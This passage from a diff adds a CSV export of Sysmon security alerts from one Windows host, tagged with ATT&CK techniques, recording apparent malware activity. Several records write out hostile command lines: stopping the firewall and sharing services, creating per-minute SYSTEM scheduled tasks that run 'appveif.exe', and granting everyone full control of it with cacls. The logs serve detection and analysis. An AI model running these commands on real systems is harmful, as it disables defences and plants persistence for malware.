+Old md5sum was: '47bd772cab29cc8ea332945ac72cdd4a'
+New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e'
+Old sha1sum was: '308d94b65326a36b3f8d9e5dcb729d52b07b5a23'
+New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709'
+"
+"May 22, 2020 @ 15:32:02.542",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set:
+RuleName: T1060,RunKey
+EventType: SetValue
+UtcTime: 2020-05-22 13:23:17.943
+ProcessGuid: {df9fc3d3-d0cd-5ec7-0000-001050a30000}
+ProcessId: 488
+Image: C:\Windows\system32\csrss.exe
+TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\RunOnce\Application Restart #0
+Details: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --flag-switches-begin --flag-switches-end --enable-audio-service-sandbox --restore-last-session""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:17.946044000Z"",""eventRecordID"":""1589"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:17.943\r\nProcessGuid: {df9fc3d3-d0cd-5ec7-0000-001050a30000}\r\nProcessId: 488\r\nImage: C:\\Windows\\system32\\csrss.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Application Restart #0\r\nDetails: C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe --flag-switches-begin --flag-switches-end --enable-audio-service-sandbox --restore-last-session\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:17.943"",""processGuid"":""{df9fc3d3-d0cd-5ec7-0000-001050a30000}"",""processId"":""488"",""image"":""C:\\\\Windows\\\\system32\\\\csrss.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Application Restart #0"",""details"":""C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe --flag-switches-begin --flag-switches-end --enable-audio-service-sandbox --restore-last-session""}}}"
+"May 22, 2020 @ 15:28:58.654",7,"Integrity checksum changed.",,"File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed.
+Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d'
+New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f'
+Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2'
+New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792'
+"
+"May 22, 2020 @ 15:28:00.188",8,"ATT&CK T1489: Stop Windows Service","""Process Create:
+RuleName:
+UtcTime: 2020-05-22 13:19:15.893
+ProcessGuid: {df9fc3d3-d153-5ec7-0000-0010f4551900}
+ProcessId: 4376
+Image: C:\Windows\SysWOW64\net1.exe
+FileVersion: 10.0.18362.1 (WinBuild.160101.0800)
+Description: Net Command
+Product: Microsoft® Windows® Operating System
+Company: Microsoft Corporation
+OriginalFileName: net1.exe
+CommandLine: C:\Windows\system32\net1 stop MpsSvc
+CurrentDirectory: C:\Users\John Williams\Downloads\
+User: DESKTOP-HUE026H\John Williams
+LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}
+LogonId: 0x30221
+TerminalSessionId: 1
+IntegrityLevel: Medium
+Hashes: MD5=DACD2D80B3942C3064B29BC0D0382EF3,SHA256=912FC9A2D5B52831C9C70643DEAB9726EC25C06E01AADE69FE844F4BA653AC7A,IMPHASH=F44A3CB56AC156111E03B2437FC54F18
+ParentProcessGuid: {df9fc3d3-d153-5ec7-0000-0010be1d1900}
+ParentProcessId: 1312
+ParentImage: C:\Windows\SysWOW64\net.exe
+ParentCommandLine: net stop MpsSvc""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:15.926691300Z"",""eventRecordID"":""974"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:15.893\r\nProcessGuid: {df9fc3d3-d153-5ec7-0000-0010f4551900}\r\nProcessId: 4376\r\nImage: C:\\Windows\\SysWOW64\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop MpsSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=DACD2D80B3942C3064B29BC0D0382EF3,SHA256=912FC9A2D5B52831C9C70643DEAB9726EC25C06E01AADE69FE844F4BA653AC7A,IMPHASH=F44A3CB56AC156111E03B2437FC54F18\r\nParentProcessGuid: {df9fc3d3-d153-5ec7-0000-0010be1d1900}\r\nParentProcessId: 1312\r\nParentImage: C:\\Windows\\SysWOW64\\net.exe\r\nParentCommandLine: net stop MpsSvc\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:15.893"",""processGuid"":""{df9fc3d3-d153-5ec7-0000-0010f4551900}"",""processId"":""4376"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop MpsSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=DACD2D80B3942C3064B29BC0D0382EF3,SHA256=912FC9A2D5B52831C9C70643DEAB9726EC25C06E01AADE69FE844F4BA653AC7A,IMPHASH=F44A3CB56AC156111E03B2437FC54F18"",""parentProcessGuid"":""{df9fc3d3-d153-5ec7-0000-0010be1d1900}"",""parentProcessId"":""1312"",""parentImage"":""C:\\\\Windows\\\\SysWOW64\\\\net.exe"",""parentCommandLine"":""net stop MpsSvc""}}}"
+"May 22, 2020 @ 15:27:59.257",10,"ATT&CK: Suspicious Process Creation","""Process Create:
+RuleName:
+UtcTime: 2020-05-22 13:19:15.191
+ProcessGuid: {df9fc3d3-d153-5ec7-0000-0010f41f1900}
+ProcessId: 3872
+Image: C:\Windows\SysWOW64\schtasks.exe
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800)
+Description: Task Scheduler Configuration Tool
+Product: Microsoft® Windows® Operating System
+Company: Microsoft Corporation
+OriginalFileName: schtasks.exe
+CommandLine: schtasks /create /sc minute /mo 1 /tn ""Netframework"" /ru system /tr ""cmd /c echo Y|cacls C:\Users\John Williams\Downloads\appveif.exe /p everyone:F""
+CurrentDirectory: C:\Users\John Williams\Downloads\
+User: DESKTOP-HUE026H\John Williams
+LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}
+LogonId: 0x30221
+TerminalSessionId: 1
+IntegrityLevel: Medium
+Hashes: MD5=A6A56567B9859A0D147C898CECB9AAAE,SHA256=97CA3FAD547C4E0FE797DB77C414213BA981BC4C39C05AA3E9E42C2A5D494139,IMPHASH=F177D457505ECC524AD2D63680709AF4
+ParentProcessGuid: {df9fc3d3-d150-5ec7-0000-0010f8951800}
+ParentProcessId: 6520
+ParentImage: C:\Windows\SysWOW64\cmd.exe
+ParentCommandLine: cmd /c schtasks /create /sc minute /mo 1 /tn ""Netframework"" /ru system /tr ""cmd /c echo Y|cacls C:\Users\John Williams\Downloads\appveif.exe /p everyone:F""""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:15.285158800Z"",""eventRecordID"":""972"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:15.191\r\nProcessGuid: {df9fc3d3-d153-5ec7-0000-0010f41f1900}\r\nProcessId: 3872\r\nImage: C:\\Windows\\SysWOW64\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: schtasks /create /sc minute /mo 1 /tn \""Netframework\"" /ru system /tr \""cmd /c echo Y|cacls C:\\Users\\John Williams\\Downloads\\appveif.exe /p everyone:F\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A6A56567B9859A0D147C898CECB9AAAE,SHA256=97CA3FAD547C4E0FE797DB77C414213BA981BC4C39C05AA3E9E42C2A5D494139,IMPHASH=F177D457505ECC524AD2D63680709AF4\r\nParentProcessGuid: {df9fc3d3-d150-5ec7-0000-0010f8951800}\r\nParentProcessId: 6520\r\nParentImage: C:\\Windows\\SysWOW64\\cmd.exe\r\nParentCommandLine: cmd /c schtasks /create /sc minute /mo 1 /tn \""Netframework\"" /ru system /tr \""cmd /c echo Y|cacls C:\\Users\\John Williams\\Downloads\\appveif.exe /p everyone:F\""\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:15.191"",""processGuid"":""{df9fc3d3-d153-5ec7-0000-0010f41f1900}"",""processId"":""3872"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""schtasks /create /sc minute /mo 1 /tn \\\""Netframework\\\"" /ru system /tr \\\""cmd /c echo Y|cacls C:\\\\Users\\\\John Williams\\\\Downloads\\\\appveif.exe /p everyone:F\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A6A56567B9859A0D147C898CECB9AAAE,SHA256=97CA3FAD547C4E0FE797DB77C414213BA981BC4C39C05AA3E9E42C2A5D494139,IMPHASH=F177D457505ECC524AD2D63680709AF4"",""parentProcessGuid"":""{df9fc3d3-d150-5ec7-0000-0010f8951800}"",""parentProcessId"":""6520"",""parentImage"":""C:\\\\Windows\\\\SysWOW64\\\\cmd.exe"",""parentCommandLine"":""cmd /c schtasks /create /sc minute /mo 1 /tn \\\""Netframework\\\"" /ru system /tr \\\""cmd /c echo Y|cacls C:\\\\Users\\\\John Williams\\\\Downloads\\\\appveif.exe /p everyone:F\\\""""}}}"
+"May 22, 2020 @ 15:27:59.199",10,"ATT&CK: Suspicious Process Creation","""Process Create:
+RuleName:
+UtcTime: 2020-05-22 13:19:15.147
+ProcessGuid: {df9fc3d3-d153-5ec7-0000-00100d1e1900}
+ProcessId: 6968
+Image: C:\Windows\SysWOW64\schtasks.exe
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800)
+Description: Task Scheduler Configuration Tool
+Product: Microsoft® Windows® Operating System
+Company: Microsoft Corporation
+OriginalFileName: schtasks.exe
+CommandLine: schtasks /create /sc minute /mo 1 /tn ""Miscfost"" /ru system /tr ""cmd /c C:\Windows\ime\appveif.exe""
+CurrentDirectory: C:\Users\John Williams\Downloads\
+User: DESKTOP-HUE026H\John Williams
+LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}
+LogonId: 0x30221
+TerminalSessionId: 1
+IntegrityLevel: Medium
+Hashes: MD5=A6A56567B9859A0D147C898CECB9AAAE,SHA256=97CA3FAD547C4E0FE797DB77C414213BA981BC4C39C05AA3E9E42C2A5D494139,IMPHASH=F177D457505ECC524AD2D63680709AF4
+ParentProcessGuid: {df9fc3d3-d150-5ec7-0000-0010fe8d1800}
+ParentProcessId: 6580
+ParentImage: C:\Windows\SysWOW64\cmd.exe
+ParentCommandLine: cmd /c schtasks /create /sc minute /mo 1 /tn ""Miscfost"" /ru system /tr ""cmd /c C:\Windows\ime\appveif.exe""""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:15.282583800Z"",""eventRecordID"":""971"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:15.147\r\nProcessGuid: {df9fc3d3-d153-5ec7-0000-00100d1e1900}\r\nProcessId: 6968\r\nImage: C:\\Windows\\SysWOW64\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: schtasks /create /sc minute /mo 1 /tn \""Miscfost\"" /ru system /tr \""cmd /c C:\\Windows\\ime\\appveif.exe\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A6A56567B9859A0D147C898CECB9AAAE,SHA256=97CA3FAD547C4E0FE797DB77C414213BA981BC4C39C05AA3E9E42C2A5D494139,IMPHASH=F177D457505ECC524AD2D63680709AF4\r\nParentProcessGuid: {df9fc3d3-d150-5ec7-0000-0010fe8d1800}\r\nParentProcessId: 6580\r\nParentImage: C:\\Windows\\SysWOW64\\cmd.exe\r\nParentCommandLine: cmd /c schtasks /create /sc minute /mo 1 /tn \""Miscfost\"" /ru system /tr \""cmd /c C:\\Windows\\ime\\appveif.exe\""\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:15.147"",""processGuid"":""{df9fc3d3-d153-5ec7-0000-00100d1e1900}"",""processId"":""6968"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""schtasks /create /sc minute /mo 1 /tn \\\""Miscfost\\\"" /ru system /tr \\\""cmd /c C:\\\\Windows\\\\ime\\\\appveif.exe\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A6A56567B9859A0D147C898CECB9AAAE,SHA256=97CA3FAD547C4E0FE797DB77C414213BA981BC4C39C05AA3E9E42C2A5D494139,IMPHASH=F177D457505ECC524AD2D63680709AF4"",""parentProcessGuid"":""{df9fc3d3-d150-5ec7-0000-0010fe8d1800}"",""parentProcessId"":""6580"",""parentImage"":""C:\\\\Windows\\\\SysWOW64\\\\cmd.exe"",""parentCommandLine"":""cmd /c schtasks /create /sc minute /mo 1 /tn \\\""Miscfost\\\"" /ru system /tr \\\""cmd /c C:\\\\Windows\\\\ime\\\\appveif.exe\\\""""}}}"
+"May 22, 2020 @ 15:27:59.171",8,"ATT&CK T1489: Stop Windows Service","""Process Create:
+RuleName:
+UtcTime: 2020-05-22 13:19:15.143
+ProcessGuid: {df9fc3d3-d153-5ec7-0000-0010be1d1900}
+ProcessId: 1312
+Image: C:\Windows\SysWOW64\net.exe
+FileVersion: 10.0.18362.1 (WinBuild.160101.0800)
+Description: Net Command
+Product: Microsoft® Windows® Operating System
+Company: Microsoft Corporation
+OriginalFileName: net.exe
+CommandLine: net stop MpsSvc
+CurrentDirectory: C:\Users\John Williams\Downloads\
+User: DESKTOP-HUE026H\John Williams
+LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}
+LogonId: 0x30221
+TerminalSessionId: 1
+IntegrityLevel: Medium
+Hashes: MD5=2D09708A2B7FD7391E50A1A8E4915BD7,SHA256=A0D28F866A78EE1BFE0CF40A9713078856F9F39258AD34E5D6E6D9227BEB1F56,IMPHASH=AC592B83B5CAEB41A6F6DF7DB53F9076
+ParentProcessGuid: {df9fc3d3-d150-5ec7-0000-0010ffa31800}
+ParentProcessId: 5872
+ParentImage: C:\Windows\SysWOW64\cmd.exe
+ParentCommandLine: cmd /c net stop MpsSvc""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:15.171719400Z"",""eventRecordID"":""970"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:15.143\r\nProcessGuid: {df9fc3d3-d153-5ec7-0000-0010be1d1900}\r\nProcessId: 1312\r\nImage: C:\\Windows\\SysWOW64\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: net stop MpsSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=2D09708A2B7FD7391E50A1A8E4915BD7,SHA256=A0D28F866A78EE1BFE0CF40A9713078856F9F39258AD34E5D6E6D9227BEB1F56,IMPHASH=AC592B83B5CAEB41A6F6DF7DB53F9076\r\nParentProcessGuid: {df9fc3d3-d150-5ec7-0000-0010ffa31800}\r\nParentProcessId: 5872\r\nParentImage: C:\\Windows\\SysWOW64\\cmd.exe\r\nParentCommandLine: cmd /c net stop MpsSvc\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:15.143"",""processGuid"":""{df9fc3d3-d153-5ec7-0000-0010be1d1900}"",""processId"":""1312"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net.exe"",""commandLine"":""net stop MpsSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=2D09708A2B7FD7391E50A1A8E4915BD7,SHA256=A0D28F866A78EE1BFE0CF40A9713078856F9F39258AD34E5D6E6D9227BEB1F56,IMPHASH=AC592B83B5CAEB41A6F6DF7DB53F9076"",""parentProcessGuid"":""{df9fc3d3-d150-5ec7-0000-0010ffa31800}"",""parentProcessId"":""5872"",""parentImage"":""C:\\\\Windows\\\\SysWOW64\\\\cmd.exe"",""parentCommandLine"":""cmd /c net stop MpsSvc""}}}"
+"May 22, 2020 @ 15:27:59.140",8,"ATT&CK T1489: Stop Windows Service","""Process Create:
+RuleName:
+UtcTime: 2020-05-22 13:19:15.099
+ProcessGuid: {df9fc3d3-d153-5ec7-0000-0010e81c1900}
+ProcessId: 2784
+Image: C:\Windows\SysWOW64\net1.exe
+FileVersion: 10.0.18362.1 (WinBuild.160101.0800)
+Description: Net Command
+Product: Microsoft® Windows® Operating System
+Company: Microsoft Corporation
+OriginalFileName: net1.exe
+CommandLine: C:\Windows\system32\net1 stop LanmanServer
+CurrentDirectory: C:\Users\John Williams\Downloads\
+User: DESKTOP-HUE026H\John Williams
+LogonGuid:
{df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=DACD2D80B3942C3064B29BC0D0382EF3,SHA256=912FC9A2D5B52831C9C70643DEAB9726EC25C06E01AADE69FE844F4BA653AC7A,IMPHASH=F44A3CB56AC156111E03B2437FC54F18 +ParentProcessGuid: {df9fc3d3-d152-5ec7-0000-00108a111900} +ParentProcessId: 6960 +ParentImage: C:\Windows\SysWOW64\net.exe +ParentCommandLine: net stop LanmanServer""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:15.104475100Z"",""eventRecordID"":""968"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:15.099\r\nProcessGuid: {df9fc3d3-d153-5ec7-0000-0010e81c1900}\r\nProcessId: 2784\r\nImage: C:\\Windows\\SysWOW64\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop LanmanServer\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=DACD2D80B3942C3064B29BC0D0382EF3,SHA256=912FC9A2D5B52831C9C70643DEAB9726EC25C06E01AADE69FE844F4BA653AC7A,IMPHASH=F44A3CB56AC156111E03B2437FC54F18\r\nParentProcessGuid: {df9fc3d3-d152-5ec7-0000-00108a111900}\r\nParentProcessId: 6960\r\nParentImage: C:\\Windows\\SysWOW64\\net.exe\r\nParentCommandLine: net stop LanmanServer\""""},""eventdata"":{""utcTime"":""2020-05-22 
13:19:15.099"",""processGuid"":""{df9fc3d3-d153-5ec7-0000-0010e81c1900}"",""processId"":""2784"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop LanmanServer"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-d0d4-5ec7-0000-002021020300}"",""logonId"":""0x30221"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=DACD2D80B3942C3064B29BC0D0382EF3,SHA256=912FC9A2D5B52831C9C70643DEAB9726EC25C06E01AADE69FE844F4BA653AC7A,IMPHASH=F44A3CB56AC156111E03B2437FC54F18"",""parentProcessGuid"":""{df9fc3d3-d152-5ec7-0000-00108a111900}"",""parentProcessId"":""6960"",""parentImage"":""C:\\\\Windows\\\\SysWOW64\\\\net.exe"",""parentCommandLine"":""net stop LanmanServer""}}}" +"May 22, 2020 @ 15:27:59.125",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-22 13:19:15.030 +ProcessGuid: {df9fc3d3-d153-5ec7-0000-0010181a1900} +ProcessId: 2232 +Image: C:\Windows\SysWOW64\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop SharedAccess +CurrentDirectory: C:\Users\John Williams\Downloads\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300} +LogonId: 0x30221 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=DACD2D80B3942C3064B29BC0D0382EF3,SHA256=912FC9A2D5B52831C9C70643DEAB9726EC25C06E01AADE69FE844F4BA653AC7A,IMPHASH=F44A3CB56AC156111E03B2437FC54F18 +ParentProcessGuid: {df9fc3d3-d152-5ec7-0000-0010ba0e1900} +ParentProcessId: 1352 +ParentImage: 
C:\Windows\SysWOW64\net.exe +ParentCommandLine: net stop SharedAccess""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:19:15.088720600Z"",""eventRecordID"":""967"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-22 13:19:15.030\r\nProcessGuid: {df9fc3d3-d153-5ec7-0000-0010181a1900}\r\nProcessId: 2232\r\nImage: C:\\Windows\\SysWOW64\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop SharedAccess\r\nCurrentDirectory: C:\\Users\\John Williams\\Downloads\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-d0d4-5ec7-0000-002021020300}\r\nLogonId: 0x30221\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=DACD2D80B3942C3064B29BC0D0382EF3,SHA256=912FC9A2D5B52831C9C70643DEAB9726EC25C06E01AADE69FE844F4BA653AC7A,IMPHASH=F44A3CB56AC156111E03B2437FC54F18\r\nParentProcessGuid: {df9fc3d3-d152-5ec7-0000-0010ba0e1900}\r\nParentProcessId: 1352\r\nParentImage: C:\\Windows\\SysWOW64\\net.exe\r\nParentCommandLine: net stop SharedAccess\""""},""eventdata"":{""utcTime"":""2020-05-22 13:19:15.030"",""processGuid"":""{df9fc3d3-d153-5ec7-0000-0010181a1900}"",""processId"":""2232"",""image"":""C:\\\\Windows\\\\SysWOW64\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
